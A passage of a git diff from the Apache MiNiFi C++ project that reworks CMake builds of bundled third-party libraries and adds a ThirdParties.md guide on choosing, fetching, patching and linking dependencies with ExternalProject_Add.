 	createExtension(RDKAFKA-EXTENSIONS "RDKAFKA EXTENSIONS" "This Enables librdkafka functionality including PublishKafka" "extensions/librdkafka" "${TEST_DIR}/kafka-tests")
 endif()
 
 ## Scripting extensions
 option(DISABLE_SCRIPTING "Disables the scripting extensions." OFF)
 if (NOT DISABLE_SCRIPTING)
+	# sol
+	add_library(sol INTERFACE)
+	target_include_directories(sol INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/sol2-2.20.0")
     createExtension(SCRIPTING-EXTENSIONS "SCRIPTING EXTENSIONS" "This enables scripting" "extensions/script" "${TEST_DIR}/script-tests")
 endif()
 
+# Sensors extensions
 option(ENABLE_SENSORS "Enables the Sensors package." OFF)
 if(ENABLE_ALL OR ENABLE_SENSORS)
 	add_subdirectory(thirdparty/RTIMULib/RTIMULib)
@@ -523,13 +372,17 @@
 ## SQLite extensions
 option(ENABLE_SQLITE "Disables the scripting extensions." OFF)
 if (ENABLE_ALL OR ENABLE_SQLITE)
-    createExtension(SQLITE-EXTENSIONS "SQLITE EXTENSIONS" "This enables sqlite" "extensions/sqlite" "${TEST_DIR}/sqlite-tests" "TRUE" "thirdparty/sqlite")
+	include(BundledSQLite)
+	use_bundled_sqlite(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(SQLITE-EXTENSIONS "SQLITE EXTENSIONS" "This enables sqlite" "extensions/sqlite" "${TEST_DIR}/sqlite-tests")
 endif()
 
 ## USB camera extensions
 option(ENABLE_USB_CAMERA "Enables USB camera support." OFF)
 if (ENABLE_ALL OR ENABLE_USB_CAMERA)
-    createExtension(USB-CAMERA-EXTENSIONS "USB CAMERA EXTENSIONS" "This enables USB camera support" "extensions/usb-camera" "${TEST_DIR}/usb-camera-tests" "TRUE" "thirdparty/libuvc-0.0.6")
+	include(BundledLibUvc)
+	use_bundled_libuvc(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(USB-CAMERA-EXTENSIONS "USB CAMERA EXTENSIONS" "This enables USB camera support" "extensions/usb-camera" "${TEST_DIR}/usb-camera-tests")
 endif()
 
 ## TensorFlow extensions
@@ -542,7 +395,9 @@
 ## AWS Extentions
 option(ENABLE_AWS "Enables AWS support." OFF)
 if (ENABLE_AWS)
-	createExtension(AWS-EXTENSIONS "AWS EXTENSIONS" "This enables AWS support" "extensions/aws" )
+	include(BundledAwsSdkCpp)
+	use_bundled_libaws(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	createExtension(AWS-EXTENSIONS "AWS EXTENSIONS" "This enables AWS support" "extensions/aws")
 endif()
 
 ## OpenCV Extesions
@@ -555,56 +410,41 @@
 ## Bustache/template extensions
 option(ENABLE_BUSTACHE "Enables Bustache (ApplyTemplate) support." OFF)
 if (ENABLE_BUSTACHE)
-    createExtension(BUSTACHE-EXTENSIONS "BUSTACHE EXTENSIONS" "This enables bustache functionality including ApplyTemplate." "extensions/bustache" "${TEST_DIR}/bustache-tests" "TRUE" "thirdparty/bustache")
+	include(BundledBustache)
+	use_bundled_bustache(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(BUSTACHE-EXTENSIONS "BUSTACHE EXTENSIONS" "This enables bustache functionality including ApplyTemplate." "extensions/bustache" "${TEST_DIR}/bustache-tests")
 endif()
 
 ## OPC Extentions
 if (ENABLE_OPC)
 	include(BundledMbedTLS)
 	use_bundled_mbedtls(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/mbedtls/dummy")
 
 	include(BundledOpen62541)
 	use_bundled_open62541(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
 
-	createExtension(OPC-EXTENSIONS "OPC EXTENSIONS" "This enables OPC-UA support" "extensions/opc" )
+	createExtension(OPC-EXTENSIONS "OPC EXTENSIONS" "This enables OPC-UA support" "extensions/opc")
 endif()
 
 ## SFTP extensions
 option(ENABLE_SFTP "Enables SFTP support." OFF)
 if ((ENABLE_ALL OR ENABLE_SFTP) AND NOT DISABLE_CURL)
-    if(WIN32 OR NOT USE_SYSTEM_LIBSSH2)
-        include(LibSSH2)
-        use_bundled_libssh2(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
-        list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/dummy")
-    else()
-        list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/sys")
-        find_package (LibSSH2 REQUIRED)
-    endif()
+	include(BundledLibSSH2)
+	use_bundled_libssh2(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/dummy")
 
     createExtension(SFTP "SFTP EXTENSIONS" "This enables SFTP support" "extensions/sftp" "extensions/sftp/tests")
-
-    if(NOT USE_SYSTEM_LIBSSH2)
-        message("minifi-sftp will depend on libssh2-external")
-        add_dependencies(minifi-sftp libssh2-external)
-    endif()
-    message("minifi-sftp will depend on curl-external")
-    add_dependencies(minifi-sftp curl-external)
-    if(NOT USE_SYSTEM_ZLIB)
-        message("minifi-sftp will depend on zlib-external")
-        add_dependencies(minifi-sftp zlib-external)
-    endif()
 endif()
 
 
 ## NOW WE CAN ADD LIBRARIES AND EXTENSIONS TO MAIN
-
 add_subdirectory(main)
 add_subdirectory(nanofi)
 
 add_dependencies(nanofi minifiexe)
 
 if (NOT DISABLE_CURL AND NOT DISABLE_CONTROLLER)
-	add_subdirectory(thirdparty/cxxopts)
 	add_subdirectory(controller)
 	add_dependencies(minificontroller minifiexe)
 endif()
@@ -629,38 +469,36 @@
 message("BUILD_IDENTIFIER is ${BUILD_IDENTIFIER}")
 
 if (WIN32)
-
-# Get the latest abbreviated commit hash of the working branch
-execute_process(
-  COMMAND git log -1 --format=%h
-  WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
-  OUTPUT_VARIABLE BUILD_REV
-  OUTPUT_STRIP_TRAILING_WHITESPACE
-)
-	execute_process(COMMAND 
-			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.bat" 
-			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}" 
-			${CMAKE_CURRENT_SOURCE_DIR} 
-			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/ 
+	# Get the latest abbreviated commit hash of the working branch
+	execute_process(
+			COMMAND git log -1 --format=%h
+			WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
+			OUTPUT_VARIABLE BUILD_REV
+			OUTPUT_STRIP_TRAILING_WHITESPACE)
+	execute_process(COMMAND
+			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.bat"
+			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}"
+			${CMAKE_CURRENT_SOURCE_DIR}
+			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/
 			"${CMAKE_CXX_COMPILER}"
-			"${CMAKE_CXX_COMPILER_VERSION}" 
-			"${CMAKE_CXX_FLAGS}" 
+			"${CMAKE_CXX_COMPILER_VERSION}"
+			"${CMAKE_CXX_FLAGS}"
 			\"${selected_extensions}\"
 			"${BUILD_IDENTIFIER}"
 			"${BUILD_REV}")
 else()
 	execute_process(COMMAND 
-		"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.sh" 
-		"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}" 
-		${CMAKE_CURRENT_SOURCE_DIR} 
-		${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/ 
-		"${CMAKE_CXX_COMPILER}"
-		"${CMAKE_CXX_COMPILER_VERSION}" 
-		"${CMAKE_CXX_FLAGS}" 
-		"${selected_extensions}" 
-		"${BUILD_IDENTIFIER}")
-
+			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.sh"
+			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}"
+			${CMAKE_CURRENT_SOURCE_DIR}
+			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/
+			"${CMAKE_CXX_COMPILER}"
+			"${CMAKE_CXX_COMPILER_VERSION}"
+			"${CMAKE_CXX_FLAGS}"
+			"${selected_extensions}"
+			"${BUILD_IDENTIFIER}")
 endif()
+
 # Generate source assembly
 set(ASSEMBLY_BASE_NAME "${CMAKE_PROJECT_NAME}-${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}")
 if(WIN32)
@@ -721,18 +559,17 @@
 
 # Generate binary assembly. Exclude conf for windows since we'll be doing the work in the WiX template
 if (NOT WIN32)
-install(FILES conf/minifi.properties conf/minifi-log.properties conf/minifi-uid.properties conf/config.yml
-        DESTINATION conf
-        COMPONENT bin)
-        
-install(DIRECTORY extensions/pythonprocessors/
-        DESTINATION minifi-python
-        COMPONENT bin)
+	install(FILES conf/minifi.properties conf/minifi-log.properties conf/minifi-uid.properties conf/config.yml
+			DESTINATION conf
+			COMPONENT bin)
 
+	install(DIRECTORY extensions/pythonprocessors/
+			DESTINATION minifi-python
+			COMPONENT bin)
 
-install(PROGRAMS bin/minifi.sh
-        DESTINATION bin
-        COMPONENT bin)
+	install(PROGRAMS bin/minifi.sh
+			DESTINATION bin
+			COMPONENT bin)
 endif()
 
 install(FILES LICENSE README.md NOTICE
@@ -740,17 +577,17 @@
         COMPONENT bin)
 
 if(WIN32)
-#preference is to use the exe type so that we have a solution that works well for cross compilation
-#but that leaves the onus up to the developer, so until we can automate some of that build let's enforce
-#the exe here temporarily
-#TODO: Remove this and automate this step.
-#install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi.exe
-        #DESTINATION bin
-        #COMPONENT bin)
+	#preference is to use the exe type so that we have a solution that works well for cross compilation
+	#but that leaves the onus up to the developer, so until we can automate some of that build let's enforce
+	#the exe here temporarily
+	#TODO: Remove this and automate this step.
+	#install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi.exe
+			#DESTINATION bin
+			#COMPONENT bin)
 else()
-install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi
-        DESTINATION bin
-        COMPONENT bin)   
+	install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi
+			DESTINATION bin
+			COMPONENT bin)
 endif() 
         
 			
diff --git a/CONTRIB.md b/CONTRIB.md
index 6e25262..d651108 100644
--- a/CONTRIB.md
+++ b/CONTRIB.md
@@ -37,6 +37,10 @@
      
 This will provide output for all source files.
 
+### Third parties
+
+Please see [ThirdParties.md](ThirdParties.md) on how MiNiFi builds and uses third party libraries and how you can add new ones.
+
 ### Extensions 
 
 MiNiFi C++ contains a dynamic loading mechanism that loads arbitrary objects. To maintain consistency of development amongst the NiFi ecosystem, it is called a class loader. If you
diff --git a/NOTICE b/NOTICE
index 7d07a68..a62ca67 100644
--- a/NOTICE
+++ b/NOTICE
@@ -21,8 +21,7 @@
 This includes derived works from the cURL (MIT/X-style licensed) project (https://github.com/curl/curl):
 Copyright (c) 1996 - 2019, Daniel Stenberg, <daniel@haxx.se>, and many contributors, see the THANKS file.
 The derived work is adapted from
-  CMake/FindLibSSH2.cmake
-and can be found in cmake/libssh2/sys/FindLibSSH2.cmake
+  CMake/FindLibSSH2.cmake and can be found in cmake/libssh2/sys/FindLibSSH2.cmake
 
 This includes derived works from the CMake (BSD 3-Clause licensed) project (https://github.com/Kitware/CMake):
 Copyright 2000-2019 Kitware, Inc. and Contributors
diff --git a/ThirdParties.md b/ThirdParties.md
new file mode 100644
index 0000000..a2aca32
--- /dev/null
+++ b/ThirdParties.md
@@ -0,0 +1,393 @@
+<!--
+  Licensed to the Apache Software Foundation (ASF) under one or more
+  contributor license agreements.  See the NOTICE file distributed with
+  this work for additional information regarding copyright ownership.
+  The ASF licenses this file to You under the Apache License, Version 2.0
+  (the "License"); you may not use this file except in compliance with
+  the License.  You may obtain a copy of the License at
+      http://www.apache.org/licenses/LICENSE-2.0
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+-->
+# Apache MiNiFi C++ Third Parties guide
+
+Apache MiNiFi C++ uses many third party libraries, both for core functionality and for extensions.
+
+This document describes the way we build and use third parties and provides a guide for adding new ones.
+
+## Table of Contents
+
+  * [Table of Contents](#table-of-contents)
+  * [Choosing a third party](#choosing-a-third-party)
+    + [License](#license)
+  * [Built-in or system dependency](#built-in-or-system-dependency)
+  * [System dependency](#system-dependency)
+    + [bootstrap.sh](#bootstrapsh)
+    + [Find\<Package\>.cmake](#find--package--cmake)
+    + [find_package](#find-package)
+  * [Built-in dependency](#built-in-dependency)
+    + [ExternalProject_Add](#externalproject-add)
+      - [`URL` and `GIT`](#-url--and--git-)
+      - [`SOURCE_DIR`](#-source-dir-)
+      - [`PATCH_COMMAND`](#-patch-command-)
+      - [`CMAKE_ARGS`](#-cmake-args-)
+      - [`BUILD_BYPRODUCTS`](#-build-byproducts-)
+      - [`EXCLUDE_FROM_ALL`](#-exclude-from-all-)
+      - [`LIST_SEPARATOR`](#-list-separator-)
+    + [Choosing a source](#choosing-a-source)
+    + [Patching](#patching)
+    + [Build options](#build-options)
+    + [find_package-like variables](#find-package-like-variables)
+    + [Imported library targets](#imported-library-targets)
+    + [Using third parties in other third parties](#using-third-parties-in-other-third-parties)
+      - [Making a third party available to other third parties](#making-a-third-party-available-to-other-third-parties)
+        * [Find\<Package\>.cmake](#find--package--cmake-1)
+        * [Passthrough variables](#passthrough-variables)
+      - [Using a third party from another third party](#using-a-third-party-from-another-third-party)
+        * [Dependencies](#dependencies)
+        * [CMake module path and passthrough args](#cmake-module-path-and-passthrough-args)
+    + [Interface libraries](#interface-libraries)
+
+
+## Choosing a third party
+
+Deciding if a third party is needed for a particular task and if so, choosing between the different implementations is difficult. A few points that have to be considered are:
+ - every third party introduces risk, both operational and security
+ - every third party adds a maintenance burden: it has to be tracked for issues, updated, adapted to changes in the build framework
+ - not using a third party and relying on less tested homegrown solutions however usually carry a greater risk than using one
+ - introducing a new third party dependency to the core should be done with the utmost care. If we make a third party a core dependency, it will increase build time, executable size and the burden to maintain API compatibility.
+
+A few tips to choose a third party:
+ - you have to choose a third party with a [proper license](#license)
+ - prefer well-maintained third parties. Abandoned projects will have a huge maintenance burden.
+ - prefer third parties with frequent/regular releases. There are some projects with a huge number of commits and a very long time since the last release, and we are at a disadvantage in determining whether the actual state of the master is stable: the maintainers should be the judges of that.
+ - prefer third parties with the smallest number of transitive dependencies. If the third party itself needs other third parties, that greatly increases the work to get it done properly the first time and then maintain it afterwards.
+
+### License
+Only third parties with an Apache License 2.0-compatible license may be linked with this software.
+
+To make sure the third party's license is compatible with Apache License 2.0, refer to the [ASF 3RD PARTY LICENSE POLICY
+](https://www.apache.org/legal/resolved.html). Please also note that license compatibility is a one-way street: a license may be compatible with Apache License 2.0 but not the other way round.
+
+GPL and LGPL are generally not compatible.
+
+## Built-in or system dependency
+When deciding whether a third party dependency should be provided by the system, or compiled and shipped by us, there are many factors to consider.
+
+|          | Advantages                                                                          | Disadvantages                                              |
+|----------|-------------------------------------------------------------------------------------|------------------------------------------------------------|
+| System   | Smaller executable size                                                             | Less control over third-party                              |
+|          | Faster compilation                                                                  | Can't add patches                                          |
+|          |                                                                                     | Has to be supported out-of-the box on all target platforms |
+|          |                                                                                     | Usually not available on Windows                           |
+| Built-in | High level of control over third-party (consistent version and features everywhere) | Larger executable size                                     |
+|          | Can add patches                                                                     | Slower compilation                                         |
+|          | Does not have to be supported by the system                                         |                                                            |
+|          | Works on Windows                                                                    |                                                            |
+
+Even if choosing a system dependency, a built-in version for Windows usually has to be made.
+
+Both a system and a built-in version can be supported, in which case the choice should be configurable via CMake options.
+
+**The goal is to abstract the nature of the third party from the rest of the project**, and create targets from them, that automatically take care of building or finding the third party and any dependencies, be it target, linking or include.
+
+## System dependency
+
+To add a new system dependency, you have to follow the following steps:
+
+### bootstrap.sh
+
+If you are using a system dependency, you have to ensure that the development packages are installed on the build system if the extension is selected.
+
+To ensure this, edit `bootstrap.sh` and all the platform-specific scripts (`centos.sh`, `fedora.sh`, `debian.sh`, `suse.sh`, `rheldistro.sh`, `darwin.sh`).
+
+### Find\<Package\>.cmake
+
+If a `Find<Package>.cmake` is provided for your third party out of the box by sufficiently old CMake versions (3.2 or earlier), then you have nothing further to do, unless it doesn't create imported library targets.
+
+If it is not provided, you have three options
+ - if a newer CMake version provides it, you can try "backporting it"
+ - you can search for an already implemented one in other projects with an acceptable license
+ - if everything else fails, you can write one yourself
+
+If you don't end up writing it from scratch, make sure that you indicate the original source in the `NOTICE` file and add the proper license to the `LICENSE` file.
+
+If you need to add a `Find<Package>.cmake` file, add it as `cmake/<package>/sys/Find<Package>.cmake`, and add it to the `CMAKE_MODULE_PATH`.
+
+### find_package
+
+After you have a working `Find<Package>.cmake`, you have to call `find_package` to actually find the package, most likely with the REQUIRED option to set, to make it fail if it can't find it.
+
+Example:
+```
+find_package(Lib<Package> REQUIRED)
+```
+
+## Built-in dependency
+We strive to build all third party dependencies using the [External Projects](https://cmake.org/cmake/help/latest/module/ExternalProject.html) CMake feature. This has many advantages over adding the third party source to our own CMake-tree with add_subdirectory:
+ - ExternalProject_Add works with non-CMake third parties
+ - we have greater control over what variables are passed to the third party project
+ - we don't have to patch the third parties to avoid target and variable name collisions
+ - we don't have to include the third party sources in our repository
+
+There are some exceptions to using External Projects:
+ - header only libraries don't require it (you could still use ExternalProject_Add to download and unpack the sources, but it is easier to just include the source in our repository and create an INTERFACE target from them).
+ - there are some libraries (notably OpenCV) which generate so many targets in so many configurations and interdependencies between the targets that it is impractical to use imported library targets with them
+ - there are a few third parties that have not yet been converted to an External Project, but they will be, eventually
+
+To add a new built-in dependency, the easiest way is to use an already existing one as a template.
+
+You will need to do the following steps:
+ - create `cmake/Bundled<Package>.cmake`
+ - (optional) if you want to use this from other third parties, create `cmake/<package>/dummy/Find<Package>.cmake`
+ - call the function created in `Bundled<Package>.cmake` in the main `CMakeLists.txt`:
+     ```
+     include(Bundled<Package>)
+     use_bundled_<package>(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+     ```
+     If you created `cmake/<package>/dummy/Find<Package>.cmake` you should also add that to the module path:
+     ```
+     list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/<package>/dummy")
+     ```
+     These should be in an extension's enabled conditional path, if the third party is only used by one extension, or in the section for third parties used by multiple packages, if used by more.
+ - Link your extension with the imported third party targets. If everything is done right, dependencies, transitive library linkings and include paths should work automatically.
+
+### ExternalProject_Add
+`ExternalProject_Add` creates a custom target that will build the third party according to our configuration.
+
+It has many options, some of which are described in greater detail later. Let's take a look at the most important ones:
+
+#### `URL` and `GIT`
+Used for fetching the source. In the case of `URL`, it is automatically unpacked. In the case of `GIT` the specified tag is checked out.
+
+See [Choosing a source](#choosing-a-source) for greater detail.
+
+Example:
+```
+GIT "https://github.com/<package>/<package>.git"
+GIT_TAG "v1.0.0"
+```
+```
+URL "https://github.com/<package>/<package>/archive/v1.0.0.tar.gz"
+URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
+```
+
+#### `SOURCE_DIR`
+The directory to which the source will be unpacked/cloned. Must be in the `BINARY_DIR`, so that we don't contaminate our source.
+
+Example:
+```
+SOURCE_DIR "${BINARY_DIR}/thirdparty/package-src"
+```
+
+#### `PATCH_COMMAND`
+Specifies a custom command to run after the source has been downloaded/updated. Needed for applying patches and in the case of non-CMake projects run custom scripts.
+
+See [Patching](#patching) for greater detail.
+
+#### `CMAKE_ARGS`
+Specifies the arguments to pass to the cmake command line.
+
+Be sure to include `${PASSTHROUGH_CMAKE_ARGS}` in this list, because it contains the basic information (compiler, build type, generator, etc.) to the third party, that must be consistent across our entire build.
+
+See [Build options](#build-options) for greater detail.
+
+#### `BUILD_BYPRODUCTS`
+`ExternalProject_Add` needs to know the list of artifacts that are generated by the third party build (and that we care about), so that it can track their modification dates.
+
+This can be usually set to the list of library archives generated by the third party.
+
+Example:
+```
+BUILD_BYPRODUCTS "${<PACKAGE>_BYPRODUCT_DIR}/lib/lib<package>.lib"
+```
+
+#### `EXCLUDE_FROM_ALL`
+This is required so that the custom target created by `ExternalProject_Add` does not get added to the default `ALL` target. This is something we generally want to avoid, as third party dependencies only make sense, if our code depends on them. We don't want them to be top-level targets and built unconditionally.
+
+#### `LIST_SEPARATOR`
+[CMake lists](https://cmake.org/cmake/help/v3.12/command/list.html#introduction) are `;` separated group of strings. When we pass `ExternalProject_Add` a list of arguments in `CMAKE_ARGS` to pass to the third party project, some of those arguments might be lists themselves (list of `CMAKE_MODULES_PATH`-s, for example), which causes issues.
+
+To avoid this, when passing list arguments, the `;`-s should be replaced with `%`-s, and the `LIST_SEPARATOR` set to `%` (it could be another character, but as `%` is pretty uncommon both in paths and other arguments, it is a good choice).
+
+Even if you don't yourself use list arguments, many parts of the build infrastructure do, like exported targets, so to be safe, set this.
+
+Example:
+```
+string(REPLACE ";" "%" LIST_ARGUMENT_TO_PASS "${LIST_ARGUMENT}")
+
+[...]
+
+LIST_SEPARATOR %
+CMAKE_ARGS -DFOO=ON
+           -DBAR=OFF
+           "-DLIST_ARGUMENT=${LIST_ARGUMENT_TO_PASS}"
+```
+
+### Choosing a source
+Prefer artifacts from the official release site or a reliable mirror. If that is not available, use the https links for releases from GitHub.
+
+Only use a git repo in a last resort:
+ - applying patches to git clones is very flaky in CMake
+ - it usually takes longer to clone a git repo than to download a specific version
+
+When using the `URL` download method, **always** use `URL_HASH` with SHA256 to verify the integrity of the downloaded artifact.
+
+When using the `GIT` download method, use the textual tag of the release instead of the commit id as the `GIT_TAG`.
+
+### Patching
+Adding patches to a third party is sometimes necessary, but maintaining a local patch set is error-prone and takes a lot of work.
+
+Before patching, please consider whether your goal could be achieved by other ways. Perhaps there is a CMake option that can disable the particular feature you want to comment out. If the third party is not the latest released version, there might be a fix upstream already released, and you can update the third party.
+
+If after all you decide the best option is patching, please follow these guidelines:
+ - keep the patch minimal: it is easier to maintain a smaller patch
+ - separate logically different patches to separate patch files: if something is fixed upstream, it is easy to remove the specific patch file for it
+ - place the patch files into the `thirdparty/<third party name>/` directory and use them from there
+ - write ExternalProject_Add's patch step in a platform-independent way: the patch executable on the system is determined in the main CMakeLists.txt, you should use that. An example command looks like this:
+   ```
+   "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/<package>/<package>.patch"
+   ```
+
+### Build options
+Both CMake and configure.sh based third parties usually come with many configuration options.
+When integrating a new third party, these should be reviewed and the proper ones set.
+
+Make sure you disable any parts that are not needed (tests, examples, unneeded features). Doing this has multiple advantages:
+ - faster compilation
+ - less security risk: if something is not compiled in, a vulnerability in that part can't affect us
+ - greater control: e.g. we don't accidentally link with another third party just because it was available on the system and was enabled by default
+
+### find_package-like variables
+When using imported library targets, having the variables generated by `find_package(Package)`, like `PACKAGE_FOUND`, `PACKAGE_LIBRARIES` and `PACKAGE_INCLUDE_PATHS` is not necessary, because these are already handled by the imported target's interface link and include dependencies.
+
+However, these are usually provided by built-in packages, for multiple reasons:
+ - backwards compatibility: proprietary extensions might depend on them (for already existing third parties)
+ - defining these is required for importing the target, and defining its link and include interface dependencies, so we might as well add them
+ - if we want to export this third party to other third parties, the dummy `Find<Package>.cmake` will require these variables anyway
+
+### Imported library targets
+[Imported library targets](https://cmake.org/cmake/help/v3.2/command/add_library.html#imported-libraries) reference a library file located outside the project.
+
+They - like other library targets - can have interface (transitive) library link, include dir and compile definitions.
+These dependencies define, respectively, what other libraries should be linked with the target that links this library, what include paths should be added when compiling a target linking to this library, and what compile flags should be added when compiling a target linking to this library.
+
+If the third party creates multiple library archives, one imported target should be created for each of them, creating the proper dependencies between them, if necessary.
+
+The imported targets should be made dependent on the target created by `ExternalProject_Add`, to make sure that we really have the proper artifacts before we want to use them.
+
+Imported targets are customarily named like `PACKAGE::libPackage`
+
+Unfortunately older CMake versions don't support `target_include_directories` and `target_link_libraries` for IMPORTED targets, so we have to work this around by directly interacting with the `INTERFACE_INCLUDE_DIRECTORIES` and `INTERFACE_LINK_LIBRARIES` lists of the target. Because of this, we also have to make sure that the include directory resulting from the installation of the third party is created beforehand, so that CMake won't complain about a non-existing directory.
+
+Example:
+```
+file(MAKE_DIRECTORY ${PACKAGE_INCLUDE_DIRS})
+
+add_library(PACKAGE::libHelper STATIC IMPORTED)
+set_target_properties(PACKAGE::libHelper PROPERTIES
+        INTERFACE_INCLUDE_DIRECTORIES "${PACKAGE_INCLUDE_DIRS}")
+set_target_properties(PACKAGE::libHelper PROPERTIES
+        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+        IMPORTED_LOCATION "${HELPER_LIBRARY}")
+add_dependencies(PACKAGE::libHelper package-external)
+
+add_library(PACKAGE::libPackage STATIC IMPORTED)
+set_target_properties(PACKAGE::libPackage PROPERTIES
+        INTERFACE_INCLUDE_DIRECTORIES "${PACKAGE_INCLUDE_DIRS}")
+set_target_properties(PACKAGE::libPackage PROPERTIES
+        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+        IMPORTED_LOCATION "${PACKAGE_LIBRARY}")
+add_dependencies(PACKAGE::libPackage package-external)
+set_property(TARGET PACKAGE::libPackage APPEND PROPERTY INTERFACE_LINK_LIBRARIES PACKAGE::libHelper)
+```
+
+### Using third parties in other third parties
+Third party libraries can depend on other third party libraries. In this case, we obviously want all third parties to use the other third parties built by us, and not start trying to find them on the system.
+
+To make a third party (user third party) use another third party (provider third party), we have to
+ - make sure the provider third party gets built before the user third party
+ - create a `Find<Package>.cmake` file for the provider third party
+ - make the user third party use this `Find<Package>.cmake` to find the provider third party
+ - pass all variables used by the provider third party's `Find<Package>.cmake` to the user third party
+ - if there are multiple dependencies, do this for every single one of them
+
+This is a complex and error-prone task, so to make it easier, a helper architecture is used.
+
+#### Making a third party available to other third parties
+
+##### Find\<Package\>.cmake
+Create `cmake/<package>/dummy/Find<Package>.cmake` like this:
+```
+if(NOT <PACKAGE>_FOUND)
+  set(<PACKAGE>_FOUND "YES" CACHE STRING "" FORCE)
+  set(<PACKAGE>_INCLUDE_DIR "${EXPORTED_<PACKAGE>_INCLUDE_DIR}" CACHE STRING "" FORCE)
+  set(<PACKAGE>_LIBRARY ${EXPORTED_<PACKAGE>_LIBRARY} CACHE STRING "" FORCE)
+endif()
+
+if(NOT TARGET <PACKAGE>::lib<Package>)
+  add_library(<PACKAGE>::lib<Package> STATIC IMPORTED)
+  set_target_properties(<PACKAGE>::lib<Package> PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${<PACKAGE>_INCLUDE_DIR}")
+  set_target_properties(<PACKAGE>::lib<Package> PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${<PACKAGE>_LIBRARY}")
+endif()
+```
+You have to use the variables that are used by the non-dummy `Find<Package>.cmake` (and consequently used by the third party).
+You only need to create imported targets here if the third party uses it instead of the variables.
+
+Once that's done, add it to the `CMAKE_MODULE_PATH` in the main `CMakeLists.txt`:
+```
+list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/<package>/dummy")
+```
+
+##### Passthrough variables
+You will also have to supply the variables used by this `Find<Package>.cmake`.
+The `PASSTHROUGH_VARIABLES` cache list is used for this: you have to append all the variables you want to pass to this list, as CMake passthrough variables.
+The variables must begin with `EXPORTED_` and must be prefixed with the third party's name, to make sure there are no collisions:
+```
+set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_<PACKAGE>_INCLUDE_DIR=${<PACKAGE>_INCLUDE_DIR}" CACHE STRING "" FORCE)
+set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_<PACKAGE>_LIBRARY=${<PACKAGE>_LIBRARY}" CACHE STRING "" FORCE)
+```
+`PASSTHROUGH_VARIABLES` will be used by the helper function that passes all necessary variables to other third parties using this third party.
+
+#### Using a third party from another third party
+
+##### Dependencies
+You have to make sure the third party is available before you want to use it from another third party.
+To ensure this, make the ExternalProject depend on the imported targets from the third party you want to use. This way the exact mode in which the third party will be provided is abstracted and can be adapted by the provider third party without breaking us:
+```
+add_dependencies(lib<package>-external FOO::libFoo BAR::libBar)
+```
+
+##### CMake module path and passthrough args
+To pass our CMake module paths and the variables used by them you can use the `append_third_party_passthrough_args` helper function that will append everything needed to your `CMAKE_ARGS`:
+```
+append_third_party_passthrough_args(<PACKAGE>_CMAKE_ARGS "${<PACKAGE>_CMAKE_ARGS}")
+```
+Make sure you also have [`LIST_SEPARATOR`](#list_separator) set to `%`, as we pass lists here.
+
+Unfortunately some third parties are written in a way that they override the `CMAKE_MODULE_PATH` passed to them via CMake args.
+If this is the case, you will have to patch the third party and change something like this
+```
+set(CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
+```
+to this
+```
+list(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
+```
+
